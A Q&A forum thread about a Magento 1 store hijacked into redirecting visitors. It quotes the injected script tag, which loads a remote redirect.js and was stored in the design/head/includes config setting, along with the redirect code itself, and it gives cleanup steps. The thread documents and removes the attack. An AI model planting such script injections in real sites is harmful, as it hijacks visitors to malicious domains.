Magento 1 – Fix Website Redirecting to Another URL

Maybe it's infected by some virus.

My website starts redirecting to these infected URL.

http://mon.setsu.xyz
and some time https://tiphainemollard.us/index/?1371499155545
Infected links

what I did to solve.

Commented .htaccess file ( nothing happen)
Commented include folder ( nothing happen)
Scanned complete server ( nothing happen no virus malware found)
Changed CSS, media and js path from the database just to ensure that weather its PHP or any js is doing ( nothing happen)
select * from core_config_data where path like '%secure%'; all links are ok
UPDATE

I googled and many articles were written on this but they suggest it was a browser issue or my system is infected. An article on this
even if I open the site on my phone or on my personal laptop, issues are same.

UPDATE 2

I found the row in the database which is affected. ( as Boris K. also saying)

In the core_config_data table design/head/includes value have a

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>

Which will be inserted in head section on page load.

If you visit the above URL you will get a script of redirect which is

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

Client website is working from afternoon once I removed that script. But the main problem is how that script inserted into the database.

One patch is also outdated so I updated that patch also.

UPDATE 3
The site is infected again.
This is the script inserted in Admin section ( Admin->Configuration->General->Design->HTML Head->Miscellaneous Script)

And in database column

I don't know what to do now.
As I changed every password,
Deleted all old users.

UPDATE 3

Till now that error doesn't come so it means by following the above steps we can overcome this issue.

UPDATE::4
Always install patches as it helps me in projects to make store less prone to these type of issues and patches are important as well.
One can use https://magescan.com/ to check the issues on their website.

Best Answer

I found the injected code in the core_config_data table, under design/head/includes. Removed it and now the site is back to normal.

UPDATE: As everyone else mentioned, it happened again this morning. This time I got rid of it more easily from the Admin Panel under System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. This is a huge vulnerability, I hope Magento is working on a patch.

UPDATE 2: The script came back again, so I changed the db password, cleared cache. About an hour later, the script is back. So I don't think it's being added thru the db. I just changed my admin password, let's see if it comes back again.

UPDATE 3: Since I changed the admin password yesterday on both of my affected sites, about 24 hours later both are still clean.

Best Answer

Related Solutions

Magento – Redirecting old website to Magento website

How to Use URL Rewrite to Direct One Category to Another

Related Topic